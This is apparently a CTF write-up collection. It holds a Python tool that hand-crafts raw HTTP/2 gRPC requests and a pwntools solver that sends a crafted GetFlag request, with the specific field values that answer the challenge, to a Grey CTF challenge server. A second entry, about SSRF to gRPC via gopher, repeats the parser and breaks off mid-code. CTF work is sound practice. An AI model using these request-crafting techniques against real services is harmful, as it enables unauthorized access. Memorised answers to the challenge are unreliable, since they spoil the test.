My New GRPC Protobuf Parser
| Event Name | Grey CTF 2025 |
| GitHub URL | - |
| Challenge Name | Sgrpc |
Attachments
References
parser.py
from colorama import Fore, Style, init
import hpack
init() # Initialize colorama
def create_message_data(**kwargs):
"""
Create a message data from a dictionary of keyword arguments.
"""
message = Message()
for key, value in kwargs.items():
setattr(message, key, value)
def create_grpc_http2_request(request_proto: bytes, service_name: str, method_name: str) -> bytes:
"""
Construct raw bytes for a gRPC request including HTTP/2 framing
Args:
request_proto: A protocol buffer message object
service_name: The name of the gRPC service
method_name: The name of the gRPC method
Returns:
bytes: The complete raw HTTP/2 + gRPC request
"""
# HTTP/2 connection preface
http2_preface = bytes.fromhex("505249202a20485454502f322e300d0a0d0a534d0d0a0d0a")
# HTTP/2 SETTINGS frame (empty)
settings_frame = bytes.fromhex("000000040000000000")
# HTTP/2 SETTINGS frame with ACK flag
settings_ack = bytes.fromhex("000000040100000000")
# Get encoded headers
encoded_headers = encode_grpc_http2_headers(service_name, method_name)
# Create headers frame (you'd need to create proper HTTP/2 frame here)
# This is simplified
headers_length = len(encoded_headers).to_bytes(3, byteorder='big')
headers_frame = headers_length + bytes.fromhex("010400000001") + encoded_headers
# Serialize the protocol buffer message
message_data = request_proto
# gRPC message framing
compressed_flag = bytes([0])
message_length = len(message_data).to_bytes(4, byteorder='big')
grpc_header = compressed_flag + message_length
# DATA frame header - add END_STREAM flag (0x01)
data_length = (len(grpc_header) + len(message_data)).to_bytes(3, byteorder='big')
data_frame_header = data_length + bytes.fromhex("000100000001")
# Combine all components
complete_request = (
http2_preface +
settings_frame +
settings_ack +
headers_frame +
data_frame_header +
grpc_header +
message_data
)
return complete_request
def encode_grpc_http2_headers(service_name, method_name):
"""Generate properly encoded HTTP/2 headers for a gRPC request."""
# Define the headers for a gRPC request
headers = [
(':method', 'POST'),
(':scheme', 'http'),
(':path', f'/{service_name}/{method_name}'),
('content-type', 'application/grpc'),
]
# Create an encoder
encoder = hpack.Encoder()
# Encode the headers
encoded_headers = encoder.encode(headers)
return encoded_headers
def decode_hpack_headers(encoded_headers):
"""
Decode HTTP/2 headers using HPACK decompression
Args:
encoded_headers: HPACK-encoded header block
Returns:
List of decoded (name, value) header tuples
"""
import hpack
# Create a decoder
decoder = hpack.Decoder()
# Decode the headers
try:
headers = decoder.decode(encoded_headers)
return headers
except Exception as e:
print(f"Error decoding headers: {e}")
return []
def get_http2_frame_type_name(type_id):
"""Return the name of an HTTP/2 frame type."""
types = {
0: "DATA",
1: "HEADERS",
2: "PRIORITY",
3: "RST_STREAM",
4: "SETTINGS",
5: "PUSH_PROMISE",
6: "PING",
7: "GOAWAY",
8: "WINDOW_UPDATE",
9: "CONTINUATION"
}
return types.get(type_id, "UNKNOWN")
def parse_grpc_response(raw_response, verbose=False, color=True):
"""
Comprehensive decoder that attempts to decode all components of a gRPC response
with configurable verbosity and color options.
Args:
raw_response: Raw HTTP/2 response bytes
verbose: If True, print detailed analysis information
color: If True, use colors in output
Returns:
Dictionary with decoded information, primarily the message
"""
# Color settings
C_FRAME = Fore.BLUE if color else ""
C_HEADER = Fore.GREEN if color else ""
C_DATA = Fore.CYAN if color else ""
C_ERROR = Fore.RED if color else ""
C_SUCCESS = Fore.GREEN if color else ""
C_RESET = Style.RESET_ALL if color else ""
if verbose:
print(f"Response length: {len(raw_response)}")
result = {
'frames': [],
'headers': {},
'trailers': {},
'messages': [],
'errors': []
}
# Process HTTP/2 frames
pos = 0
current_stream_id = None
header_blocks = {} # Map stream_id -> accumulated header block
is_trailer = {} # Map stream_id -> boolean (if this is a trailer block)
while pos < len(raw_response):
# Ensure we have enough bytes for a frame header
if pos + 9 > len(raw_response):
error_msg = f"Incomplete frame header at position {pos}"
result['errors'].append(error_msg)
if verbose:
print(f"{C_ERROR}{error_msg}{C_RESET}")
break
# Parse frame header
length = int.from_bytes(raw_response[pos:pos+3], byteorder='big')
frame_type = raw_response[pos+3]
flags = raw_response[pos+4]
stream_id = int.from_bytes(raw_response[pos+5:pos+9], byteorder='big') & 0x7FFFFFFF
end_headers = (flags & 0x04) != 0 # END_HEADERS flag
end_stream = (flags & 0x01) != 0 # END_STREAM flag
frame_info = {
'position': pos,
'length': length,
'type': frame_type,
'type_name': get_http2_frame_type_name(frame_type),
'flags': flags,
'stream_id': stream_id,
'end_headers': end_headers,
'end_stream': end_stream
}
if verbose:
print(f"\n{C_FRAME}Frame at position {pos}:{C_RESET}")
print(f" {C_FRAME}Type:{C_RESET} {get_http2_frame_type_name(frame_type)} ({frame_type})")
print(f" {C_FRAME}Length:{C_RESET} {length}")
print(f" {C_FRAME}Flags:{C_RESET} {flags:08b} (END_HEADERS: {end_headers}, END_STREAM: {end_stream})")
print(f" {C_FRAME}Stream ID:{C_RESET} {stream_id}")
pos += 9 # Move past frame header
# Process frame payload
if pos + length > len(raw_response):
error_msg = f"Incomplete frame payload (need {length} bytes, have {len(raw_response) - pos})"
frame_info['error'] = error_msg
result['errors'].append(error_msg)
result['frames'].append(frame_info)
if verbose:
print(f" {C_ERROR}{error_msg}{C_RESET}")
break
frame_payload = raw_response[pos:pos+length]
# Handle different frame types
if frame_type == 0: # DATA frame
if verbose:
print(f" {C_DATA}DATA frame payload:{C_RESET}")
# Use the dedicated decoder
message_result = decode_grpc_data_frame_payload(
frame_payload,
message_types=[], # Add more message types as needed
verbose=verbose,
color=color
)
# Add decoded info to frame_info
frame_info.update({
'grpc_message': message_result
})
# If we successfully parsed a message, add it to results
if message_result['valid'] and 'parsed' in message_result:
result['messages'].append(message_result['parsed'])
elif frame_type == 1: # HEADERS frame
if verbose:
print(f" {C_HEADER}HEADERS frame payload:{C_RESET}")
# Start collecting header block for this stream
if stream_id not in header_blocks:
header_blocks[stream_id] = bytearray()
is_trailer[stream_id] = end_stream # Headers at the end of stream are trailers
# Add this block
header_blocks[stream_id].extend(frame_payload)
# If this is the end of headers, decode them
if end_headers:
headers = decode_hpack_headers(frame_payload)
frame_info['decoded_headers'] = headers
if headers:
if verbose:
print(f" {C_HEADER}Decoded headers:{C_RESET}")
for name, value in headers:
print(f" {C_HEADER}{name}:{C_RESET} {value}")
# Store in appropriate place depending on if this is a trailer
if is_trailer[stream_id]:
result['trailers'][stream_id] = headers
else:
result['headers'][stream_id] = headers
elif verbose:
print(f" {C_ERROR}Failed to decode headers{C_RESET}")
# Clear the header block now that we've processed it
del header_blocks[stream_id]
else:
current_stream_id = stream_id # Remember for CONTINUATION frames
elif frame_type == 9 and stream_id == current_stream_id: # CONTINUATION frame
if verbose:
print(f" {C_HEADER}CONTINUATION frame payload{C_RESET}")
# Add to the header block
if stream_id in header_blocks:
header_blocks[stream_id].extend(frame_payload)
# If this is the end of headers, decode them
if end_headers:
headers = decode_hpack_headers(frame_payload)
frame_info['decoded_headers'] = headers
if headers and verbose:
print(f" {C_HEADER}Decoded continuation headers:{C_RESET}")
for name, value in headers:
print(f" {C_HEADER}{name}:{C_RESET} {value}")
# Store in appropriate place depending on if this is a trailer
if is_trailer[stream_id]:
result['trailers'][stream_id] = headers
else:
result['headers'][stream_id] = headers
elif verbose:
print(f" {C_ERROR}Failed to decode continuation headers{C_RESET}")
# Clear the header block and reset current stream
del header_blocks[stream_id]
current_stream_id = None
# Process error frames (GOAWAY, RST_STREAM) only in verbose mode
elif verbose:
if frame_type == 7: # GOAWAY frame
if len(frame_payload) >= 8:
last_stream_id = int.from_bytes(frame_payload[0:4], byteorder='big') & 0x7FFFFFFF
error_code = int.from_bytes(frame_payload[4:8], byteorder='big')
print(f" {C_ERROR}GOAWAY:{C_RESET} Last Stream ID={last_stream_id}, Error={get_http2_error_name(error_code)}")
elif frame_type == 3: # RST_STREAM frame
if len(frame_payload) == 4:
error_code = int.from_bytes(frame_payload, byteorder='big')
print(f" {C_ERROR}RST_STREAM:{C_RESET} Error={get_http2_error_name(error_code)}")
else:
print(f" Payload: {frame_payload.hex()[:30]}..." if len(frame_payload) > 30 else frame_payload.hex())
result['frames'].append(frame_info)
pos += length # Move to next frame
# Extract gRPC status from trailers
for stream_id, trailers in result['trailers'].items():
for name, value in trailers:
if name == 'grpc-status':
status_code = int(value)
result['grpc_status'] = {
'code': status_code,
'name': get_grpc_status_name(status_code)
}
if verbose:
status_color = C_SUCCESS if status_code == 0 else C_ERROR
print(f"\n{status_color}gRPC Status: {status_code} ({get_grpc_status_name(status_code)}){C_RESET}")
if name == 'grpc-message':
if 'grpc_status' not in result:
result['grpc_status'] = {}
result['grpc_status']['message'] = value
if verbose:
print(f"{C_ERROR}gRPC Message: {value}{C_RESET}")
# Final summary only in verbose mode
if verbose:
print(f"\n{C_FRAME}=== SUMMARY ==={C_RESET}")
print(f"Total frames: {len(result['frames'])}")
print(f"Headers: {len(result['headers'])} streams")
print(f"Trailers: {len(result['trailers'])} streams")
print(f"Decoded messages: {len(result['messages'])}")
print(f"Errors: {len(result['errors'])}")
# For cleaner non-verbose output, just print the first message if found
if result['messages'] and not verbose:
msg = result['messages'][0]
print(f"{C_SUCCESS}Decoded {msg['type']}:{C_RESET} {msg['parsed']}")
return result
def get_http2_error_name(code):
"""Return the name of an HTTP/2 error code."""
codes = {
0: "NO_ERROR",
1: "PROTOCOL_ERROR",
2: "INTERNAL_ERROR",
3: "FLOW_CONTROL_ERROR",
4: "SETTINGS_TIMEOUT",
5: "STREAM_CLOSED",
6: "FRAME_SIZE_ERROR",
7: "REFUSED_STREAM",
8: "CANCEL",
9: "COMPRESSION_ERROR",
10: "CONNECT_ERROR",
11: "ENHANCE_YOUR_CALM",
12: "INADEQUATE_SECURITY",
13: "HTTP_1_1_REQUIRED"
}
return codes.get(code, f"UNKNOWN_ERROR_{code}")
def get_grpc_status_name(code):
"""Return the name of a gRPC status code."""
codes = {
0: "OK",
1: "CANCELLED",
2: "UNKNOWN",
3: "INVALID_ARGUMENT",
4: "DEADLINE_EXCEEDED",
5: "NOT_FOUND",
6: "ALREADY_EXISTS",
7: "PERMISSION_DENIED",
8: "RESOURCE_EXHAUSTED",
9: "FAILED_PRECONDITION",
10: "ABORTED",
11: "OUT_OF_RANGE",
12: "UNIMPLEMENTED",
13: "INTERNAL",
14: "UNAVAILABLE",
15: "DATA_LOSS",
16: "UNAUTHENTICATED"
}
return codes.get(code, f"UNKNOWN_STATUS_{code}")
def parse_grpc_request(raw_request, verbose=False, color=True):
"""
Decodes a raw gRPC HTTP/2 request and extracts relevant information.
Args:
raw_request: Raw HTTP/2 request bytes
verbose: If True, print detailed analysis information
color: If True, use colors in output
Returns:
Dictionary with decoded information (preface, frames, headers, message)
"""
# Color settings
C_FRAME = Fore.BLUE if color else ""
C_HEADER = Fore.GREEN if color else ""
C_DATA = Fore.CYAN if color else ""
C_ERROR = Fore.RED if color else ""
C_SUCCESS = Fore.GREEN if color else ""
C_RESET = Style.RESET_ALL if color else ""
if verbose:
print(f"Request length: {len(raw_request)}")
result = {
'preface': None,
'frames': [],
'headers': {},
'messages': [],
'errors': []
}
# Look for HTTP/2 connection preface
http2_preface_hex = "505249202a20485454502f322e300d0a0d0a534d0d0a0d0a"
http2_preface = bytes.fromhex(http2_preface_hex)
pos = 0
if len(raw_request) >= len(http2_preface) and raw_request.startswith(http2_preface):
result['preface'] = {
'position': 0,
'length': len(http2_preface),
'valid': True
}
if verbose:
print(f"{C_SUCCESS}Found valid HTTP/2 connection preface{C_RESET}")
pos = len(http2_preface)
else:
result['preface'] = {
'position': 0,
'valid': False
}
if verbose:
print(f"{C_ERROR}HTTP/2 connection preface not found{C_RESET}")
# Process HTTP/2 frames
current_stream_id = None
header_blocks = {} # Map stream_id -> accumulated header block
while pos < len(raw_request):
# Ensure we have enough bytes for a frame header
if pos + 9 > len(raw_request):
error_msg = f"Incomplete frame header at position {pos}"
result['errors'].append(error_msg)
if verbose:
print(f"{C_ERROR}{error_msg}{C_RESET}")
break
# Parse frame header
length = int.from_bytes(raw_request[pos:pos+3], byteorder='big')
frame_type = raw_request[pos+3]
flags = raw_request[pos+4]
stream_id = int.from_bytes(raw_request[pos+5:pos+9], byteorder='big') & 0x7FFFFFFF
end_headers = (flags & 0x04) != 0 # END_HEADERS flag
end_stream = (flags & 0x01) != 0 # END_STREAM flag
frame_info = {
'position': pos,
'length': length,
'type': frame_type,
'type_name': get_http2_frame_type_name(frame_type),
'flags': flags,
'stream_id': stream_id,
'end_headers': end_headers,
'end_stream': end_stream
}
if verbose:
print(f"\n{C_FRAME}Frame at position {pos}:{C_RESET}")
print(f" {C_FRAME}Type:{C_RESET} {get_http2_frame_type_name(frame_type)} ({frame_type})")
print(f" {C_FRAME}Length:{C_RESET} {length}")
print(f" {C_FRAME}Flags:{C_RESET} {flags:08b} (END_HEADERS: {end_headers}, END_STREAM: {end_stream})")
print(f" {C_FRAME}Stream ID:{C_RESET} {stream_id}")
pos += 9 # Move past frame header
# Process frame payload
if pos + length > len(raw_request):
error_msg = f"Incomplete frame payload (need {length} bytes, have {len(raw_request) - pos})"
frame_info['error'] = error_msg
result['errors'].append(error_msg)
result['frames'].append(frame_info)
if verbose:
print(f" {C_ERROR}{error_msg}{C_RESET}")
break
frame_payload = raw_request[pos:pos+length]
# Handle different frame types
if frame_type == 0: # DATA frame
if verbose:
print(f" {C_DATA}DATA frame payload:{C_RESET}")
# Use the dedicated decoder (without message types since we don't know the request type)
message_result = decode_grpc_data_frame_payload(
frame_payload,
verbose=verbose,
color=color
)
# Add decoded info to frame_info
frame_info.update({
'grpc_message': message_result
})
# For request, store the raw message data for further analysis
if message_result['valid']:
result['messages'].append({
'length': message_result['message_length'],
'compressed': message_result['compressed'],
'raw_data': message_result['message_data'],
'hex_data': message_result['hex_data']
})
elif frame_type == 1: # HEADERS frame
if verbose:
print(f" {C_HEADER}HEADERS frame payload:{C_RESET}")
# Start collecting header block for this stream
if stream_id not in header_blocks:
header_blocks[stream_id] = bytearray()
# Add this block
header_blocks[stream_id].extend(frame_payload)
# If this is the end of headers, decode them
if end_headers:
headers = decode_hpack_headers(header_blocks[stream_id])
frame_info['decoded_headers'] = headers
if headers:
if verbose:
print(f" {C_HEADER}Decoded headers:{C_RESET}")
for name, value in headers:
print(f" {C_HEADER}{name}:{C_RESET} {value}")
result['headers'][stream_id] = headers
# Extract service and method from headers if present
path = None
for name, value in headers:
if name == ':path':
path = value
break
if path and path.startswith('/'):
parts = path[1:].split('/')
if len(parts) >= 2:
result['service'] = parts[0]
result['method'] = parts[1]
if verbose:
print(f" {C_SUCCESS}Identified service:{C_RESET} {parts[0]}")
print(f" {C_SUCCESS}Identified method:{C_RESET} {parts[1]}")
elif verbose:
print(f" {C_ERROR}Failed to decode headers{C_RESET}")
# Clear the header block now that we've processed it
del header_blocks[stream_id]
else:
current_stream_id = stream_id # Remember for CONTINUATION frames
elif frame_type == 9 and stream_id == current_stream_id: # CONTINUATION frame
if verbose:
print(f" {C_HEADER}CONTINUATION frame payload{C_RESET}")
# Add to the header block
if stream_id in header_blocks:
header_blocks[stream_id].extend(frame_payload)
# If this is the end of headers, decode them
if end_headers:
headers = decode_hpack_headers(header_blocks[stream_id])
frame_info['decoded_headers'] = headers
if headers and verbose:
print(f" {C_HEADER}Decoded continuation headers:{C_RESET}")
for name, value in headers:
print(f" {C_HEADER}{name}:{C_RESET} {value}")
result['headers'][stream_id] = headers
elif verbose:
print(f" {C_ERROR}Failed to decode continuation headers{C_RESET}")
# Clear the header block and reset current stream
del header_blocks[stream_id]
current_stream_id = None
# Process other frame types (only in verbose mode)
elif verbose and frame_type == 4: # SETTINGS frame
print(f" {C_FRAME}SETTINGS frame{C_RESET}")
# Parse settings parameters (pairs of 16-bit identifiers and 32-bit values)
i = 0
settings = []
while i + 6 <= len(frame_payload):
identifier = int.from_bytes(frame_payload[i:i+2], byteorder='big')
value = int.from_bytes(frame_payload[i+2:i+6], byteorder='big')
setting_name = get_http2_setting_name(identifier)
settings.append((identifier, setting_name, value))
print(f" {C_FRAME}Setting:{C_RESET} {setting_name} ({identifier}) = {value}")
i += 6
frame_info['settings'] = settings
elif verbose:
print(f" Payload: {frame_payload.hex()[:30]}..." if len(frame_payload) > 30 else frame_payload.hex())
result['frames'].append(frame_info)
pos += length # Move to next frame
# Final summary only in verbose mode
if verbose:
print(f"\n{C_FRAME}=== SUMMARY ==={C_RESET}")
print(f"Total frames: {len(result['frames'])}")
print(f"Headers: {len(result['headers'])} streams")
print(f"Messages: {len(result['messages'])}")
print(f"Errors: {len(result['errors'])}")
if 'service' in result and 'method' in result:
print(f"Service: {result['service']}")
print(f"Method: {result['method']}")
# For cleaner non-verbose output, just print basic info
if not verbose:
if 'service' in result and 'method' in result:
print(f"{C_SUCCESS}Request for {result['service']}/{result['method']}{C_RESET}")
print(f"Frames: {len(result['frames'])}, Messages: {len(result['messages'])}")
return result
def get_http2_setting_name(identifier):
"""Return the name of an HTTP/2 setting identifier."""
settings = {
0x1: "HEADER_TABLE_SIZE",
0x2: "ENABLE_PUSH",
0x3: "MAX_CONCURRENT_STREAMS",
0x4: "INITIAL_WINDOW_SIZE",
0x5: "MAX_FRAME_SIZE",
0x6: "MAX_HEADER_LIST_SIZE",
0x8: "ENABLE_CONNECT_PROTOCOL"
}
return settings.get(identifier, f"UNKNOWN_{identifier}")
def decode_grpc_data_frame_payload(frame_payload, message_types=None, verbose=False, color=True):
"""
Decodes a gRPC data frame payload that contains a message with length prefixing.
Args:
frame_payload: Raw bytes of the DATA frame payload
message_types: List of protobuf message types to try parsing with (optional)
verbose: If True, print detailed analysis information
color: If True, use colors in output
Returns:
Dictionary with decoded information about the message
"""
# Color settings
C_DATA = Fore.CYAN if color else ""
C_ERROR = Fore.RED if color else ""
C_SUCCESS = Fore.GREEN if color else ""
C_RESET = Style.RESET_ALL if color else ""
result = {
'valid': False,
'error': None
}
# Check if we have enough bytes for gRPC message header (1 byte compressed flag + 4 bytes length)
if len(frame_payload) < 5:
result['error'] = f"Incomplete gRPC message header (need 5 bytes, have {len(frame_payload)})"
if verbose:
print(f" {C_ERROR}{result['error']}{C_RESET}")
return result
# Extract gRPC message framing
compressed = frame_payload[0]
message_length = int.from_bytes(frame_payload[1:5], byteorder='big')
result.update({
'valid': True,
'compressed': compressed,
'message_length': message_length,
})
if verbose:
print(f" {C_DATA}gRPC message framing:{C_RESET}")
print(f" Compressed: {compressed}")
print(f" Message length: {message_length} bytes")
# Check if we have the complete message
if len(frame_payload) < 5 + message_length:
result['error'] = f"Incomplete message data (need {message_length} bytes, have {len(frame_payload) - 5})"
if verbose:
print(f" {C_ERROR}{result['error']}{C_RESET}")
return result
# Extract the message data
message_data = frame_payload[5:5+message_length]
result['message_data'] = message_data
result['hex_data'] = message_data.hex()
if verbose:
print(f" {C_DATA}Message data (hex):{C_RESET}")
hex_data = message_data.hex()
# Format hex data in chunks for better readability
if len(hex_data) > 100:
formatted_hex = "\n ".join(
[hex_data[i:i+64] for i in range(0, min(300, len(hex_data)), 64)]
)
if len(hex_data) > 300:
formatted_hex += f"\n ... ({len(hex_data) - 300} more bytes)"
print(f" {formatted_hex}")
else:
print(f" {hex_data}")
# Try to parse with provided message types
if message_types:
for msg_type in message_types:
try:
message = msg_type()
message.ParseFromString(message_data)
result['parsed'] = {
'type': msg_type.__name__,
'message': message,
'text': str(message)
}
if verbose:
print(f" {C_SUCCESS}Parsed as {msg_type.__name__}:{C_RESET}")
print(f" {str(message).replace('\n', '\n ')}")
break
except Exception as e:
if verbose:
print(f" {C_ERROR}Failed to parse as {msg_type.__name__}: {e}{C_RESET}")
# If there's remaining data in the frame payload, note it
if len(frame_payload) > 5 + message_length:
remaining = len(frame_payload) - (5 + message_length)
result['remaining_bytes'] = remaining
if verbose:
print(f" {C_DATA}Note: {remaining} bytes remaining after message{C_RESET}")
return result
import struct
from typing import Iterable
# Wire‑type constants -------------------------------------------------------
VARINT = 0 # int32, int64, uint32, uint64, sint32, sint64, bool, enum
I64 = 1 # fixed64, sfixed64, double
LEN = 2 # length‑delimited: string, bytes, sub‑messages, packed fields
SGROUP = 3 # start‑group (deprecated)
EGROUP = 4 # end‑group (deprecated)
I32 = 5 # fixed32, sfixed32, float
class ProtobufEncoder:
"""Incrementally builds a protobuf message in wire format."""
def __init__(self) -> None:
self._buf = bytearray()
# --- Low‑level helpers --------------------------------------------------
@staticmethod
def _encode_varint(val: int) -> bytes:
"""Encodes *val* as an unsigned varint (little‑endian 7‑bit chunks)."""
# Negative numbers are treated as two's‑complement on the wire; we
# just cast them into 64‑bit unsigned space.
if val < 0:
val &= (1 << 64) - 1
out = bytearray()
while True:
to_write = val & 0x7F
val >>= 7
if val:
out.append(to_write | 0x80)
else:
out.append(to_write)
break
return bytes(out)
@staticmethod
def _encode_zigzag(val: int, bits: int = 64) -> int:
"""Applies ZigZag transform (for sint* types)."""
return (val << 1) ^ (val >> (bits - 1))
@classmethod
def _tag(cls, field_no: int, wire_type: int) -> bytes:
"""Returns the varint tag for *field_no* / *wire_type*."""
return cls._encode_varint((field_no << 3) | wire_type)
# --- Public field writers ---------------------------------------------
def add_varint(self, field_no: int, val: int) -> None:
"""Writes an *int* / *uint* / *bool* / *enum* value."""
self._buf += self._tag(field_no, VARINT)
self._buf += self._encode_varint(val)
def add_sint(self, field_no: int, val: int, bits: int = 64) -> None:
"""Writes a ZigZag‑encoded *sint32* / *sint64*."""
self.add_varint(field_no, self._encode_zigzag(val, bits))
def add_fixed32(self, field_no: int, val: int) -> None:
self._buf += self._tag(field_no, I32)
self._buf += struct.pack('<I', val & 0xFFFFFFFF)
def add_fixed64(self, field_no: int, val: int) -> None:
self._buf += self._tag(field_no, I64)
self._buf += struct.pack('<Q', val & 0xFFFFFFFFFFFFFFFF)
def add_float(self, field_no: int, val: float) -> None:
self._buf += self._tag(field_no, I32)
self._buf += struct.pack('<f', val)
def add_double(self, field_no: int, val: float) -> None:
self._buf += self._tag(field_no, I64)
self._buf += struct.pack('<d', val)
def add_bytes(self, field_no: int, data: bytes) -> None:
self._buf += self._tag(field_no, LEN)
self._buf += self._encode_varint(len(data))
self._buf += data
def add_string(self, field_no: int, text: str) -> None:
self.add_bytes(field_no, text.encode("utf‑8"))
def add_message(self, field_no: int, msg: "ProtobufEncoder") -> None:
encoded = msg.to_bytes()
self.add_bytes(field_no, encoded)
# --- Packed repeated helpers ------------------------------------------
def add_packed_varints(self, field_no: int, vals: Iterable[int]) -> None:
chunk = bytearray().join(self._encode_varint(v) for v in vals)
self.add_bytes(field_no, chunk)
# --- Output ------------------------------------------------------------
def to_bytes(self) -> bytes: # pragma: no cover
"""Returns the encoded message as *bytes*."""
return bytes(self._buf)
def hex(self, sep: str = "") -> str: # pragma: no cover
"""Hex‑encode the message (shortcut for quick inspection)."""
return self.to_bytes().hex(sep)
# --- Convenience dunder -----------------------------------------------
def __bytes__(self) -> bytes: # pragma: no cover
return self.to_bytes()
def __repr__(self) -> str: # pragma: no cover
return f"<ProtobufEncoder {self.hex()}>"
solver.py
import asyncio
from pwn import *
import parser
async def main():
protobuf_encoder = parser.ProtobufEncoder()
# last condition
protobuf_encoder.add_fixed64(1, 3141592654)
# first condition
protobuf_encoder.add_string(2, "TraLaLeRo TraLaLa")
# second condition
protobuf_encoder.add_bytes(3, b"cafebabe")
# protobuf_encoder.add_string(4, "flag.Flag.Hello")
payload = parser.create_grpc_http2_request(
protobuf_encoder.to_bytes(),
"flag.Flag",
"GetFlag"
# "grpc.reflection.v1.ServerReflection",
# "ServerReflectionInfo"
)
print(payload)
r = remote("challs.nusgreyhats.org", 33202)
r.send(payload)
res = r.recvall(timeout=2)
print(parser.parse_grpc_response(res))
r.interactive()
if __name__ == "__main__":
asyncio.run(main())
SSRF to gRPC via gopher protocol
| Event Name | Cyber Apocalypse CTF 2025: Tales from Eldoria After Party |
| GitHub URL | - |
| Challenge Name | Eldoria Realms |
Attachments
References
parser.py
from colorama import Fore, Style, init
import hpack
from challenge.live_data_pb2 import HealthCheckResponse
init() # Initialize colorama
def create_grpc_http2_request(request_proto: bytes, service_name: str, method_name: str) -> bytes:
"""
Construct raw bytes for a gRPC request including HTTP/2 framing
Args:
request_proto: A protocol buffer message object
service_name: The name of the gRPC service
method_name: The name of the gRPC method
Returns:
bytes: The complete raw HTTP/2 + gRPC request
"""
# HTTP/2 connection preface
http2_preface = bytes.fromhex("505249202a20485454502f322e300d0a0d0a534d0d0a0d0a")
# HTTP/2 SETTINGS frame (empty)
settings_frame = bytes.fromhex("000000040000000000")
# HTTP/2 SETTINGS frame with ACK flag
settings_ack = bytes.fromhex("000000040100000000")
# Get encoded headers
encoded_headers = encode_grpc_http2_headers(service_name, method_name)
# Create headers frame (you'd need to create proper HTTP/2 frame here)
# This is simplified
headers_length = len(encoded_headers).to_bytes(3, byteorder='big')
headers_frame = headers_length + bytes.fromhex("010400000001") + encoded_headers
# Serialize the protocol buffer message
message_data = request_proto.SerializeToString()
# gRPC message framing
compressed_flag = bytes([0])
message_length = len(message_data).to_bytes(4, byteorder='big')
grpc_header = compressed_flag + message_length
# DATA frame header - add END_STREAM flag (0x01)
data_length = (len(grpc_header) + len(message_data)).to_bytes(3, byteorder='big')
data_frame_header = data_length + bytes.fromhex("000100000001")
# Combine all components
complete_request = (
http2_preface +
settings_frame +
settings_ack +
headers_frame +
data_frame_header +
grpc_header +
message_data
)
return complete_request
def encode_grpc_http2_headers(service_name, method_name):
"""Generate properly encoded HTTP/2 headers for a gRPC request."""
# Define the headers for a gRPC request
headers = [
(':method', 'POST'),
(':scheme', 'http'),
(':path', f'/{service_name}/{method_name}'),
('content-type', 'application/grpc'),
]
# Create an encoder
encoder = hpack.Encoder()
# Encode the headers
encoded_headers = encoder.encode(headers)
return encoded_headers
def decode_hpack_headers(encoded_headers):
"""
Decode HTTP/2 headers using HPACK decompression
Args:
encoded_headers: HPACK-encoded header block
Returns:
List of decoded (name, value) header tuples
"""
import hpack
# Create a decoder
decoder = hpack.Decoder()
# Decode the headers
try:
headers = decoder.decode(encoded_headers)
return headers
except Exception as e:
print(f"Error decoding headers: {e}")
return []
def get_http2_frame_type_name(type_id):
"""Return the name of an HTTP/2 frame type."""
types = {
0: "DATA",
1: "HEADERS",
2: "PRIORITY",
3: "RST_STREAM",
4: "SETTINGS",
5: "PUSH_PROMISE",
6: "PING",
7: "GOAWAY",
8: "WINDOW_UPDATE",
9: "CONTINUATION"
}
return types.get(type_id, "UNKNOWN")
def parse_grpc_response(raw_response, verbose=False, color=True):
"""
Comprehensive decoder that attempts to decode all components of a gRPC response
with configurable verbosity and color options.
Args:
raw_response: Raw HTTP/2 response bytes
verbose: If True, print detailed analysis information
color: If True, use colors in output
Returns:
Dictionary with decoded information, primarily the message
"""
# Color settings
C_FRAME = Fore.BLUE if color else ""
C_HEADER = Fore.GREEN if color else ""
C_DATA = Fore.CYAN if color else ""
C_ERROR = Fore.RED if color else ""
C_SUCCESS = Fore.GREEN if color else ""
C_RESET = Style.RESET_ALL if color else ""
if verbose:
print(f"Response length: {len(raw_response)}")
result = {
'frames': [],
'headers': {},
'trailers': {},
'messages': [],
'errors': []
}
# Process HTTP/2 frames
pos = 0
current_stream_id = None
header_blocks = {} # Map stream_id -> accumulated header block
is_trailer = {} # Map stream_id -> boolean (if this is a trailer block)
while pos < len(raw_response):
# Ensure we have enough bytes for a frame header
if pos + 9 > len(raw_response):
error_msg = f"Incomplete frame header at position {pos}"
result['errors'].append(error_msg)
if verbose:
print(f"{C_ERROR}{error_msg}{C_RESET}")
break
# Parse frame header
length = int.from_bytes(raw_response[pos:pos+3], byteorder='big')
frame_type = raw_response[pos+3]
flags = raw_response[pos+4]
stream_id = int.from_bytes(raw_response[pos+5:pos+9], byteorder='big') & 0x7FFFFFFF
end_headers = (flags & 0x04) != 0 # END_HEADERS flag
end_stream = (flags & 0x01) != 0 # END_STREAM flag
frame_info = {
'position': pos,
'length': length,
'type': frame_type,
'type_name': get_http2_frame_type_name(frame_type),
'flags': flags,
'stream_id': stream_id,
'end_headers': end_headers,
'end_stream': end_stream
}
if verbose:
print(f"\n{C_FRAME}Frame at position {pos}:{C_RESET}")
print(f" {C_FRAME}Type:{C_RESET} {get_http2_frame_type_name(frame_type)} ({frame_type})")
print(f" {C_FRAME}Length:{C_RESET} {length}")
print(f" {C_FRAME}Flags:{C_RESET} {flags:08b} (END_HEADERS: {end_headers}, END_STREAM: {end_stream})")
print(f" {C_FRAME}Stream ID:{C_RESET} {stream_id}")
pos += 9 # Move past frame header
# Process frame payload
if pos + length > len(raw_response):
error_msg = f"Incomplete frame payload (need {length} bytes, have {len(raw_response) - pos})"
frame_info['error'] = error_msg
result['errors'].append(error_msg)
result['frames'].append(frame_info)
if verbose:
print(f" {C_ERROR}{error_msg}{C_RESET}")
break
frame_payload = raw_response[pos:pos+length]
# Handle different frame types
if frame_type == 0: # DATA frame
if verbose:
print(f" {C_DATA}DATA frame payload:{C_RESET}")
# Use the dedicated decoder
message_result = decode_grpc_data_frame_payload(
frame_payload,
message_types=[HealthCheckResponse], # Add more message types as needed
verbose=verbose,
color=color
)
# Add decoded info to frame_info
frame_info.update({
'grpc_message': message_result
})
# If we successfully parsed a message, add it to results
if message_result['valid'] and 'parsed' in message_result:
result['messages'].append(message_result['parsed'])
elif frame_type == 1: # HEADERS frame
if verbose:
print(f" {C_HEADER}HEADERS frame payload:{C_RESET}")
# Start collecting header block for this stream
if stream_id not in header_blocks:
header_blocks[stream_id] = bytearray()
is_trailer[stream_id] = end_stream # Headers at the end of stream are trailers
# Add this block
header_blocks[stream_id].extend(frame_payload)
# If this is the end of headers, decode them
if end_headers:
headers = decode_hpack_headers(frame_payload)
frame_info['decoded_headers'] = headers
if headers:
if verbose:
print(f" {C_HEADER}Decoded headers:{C_RESET}")
for name, value in headers:
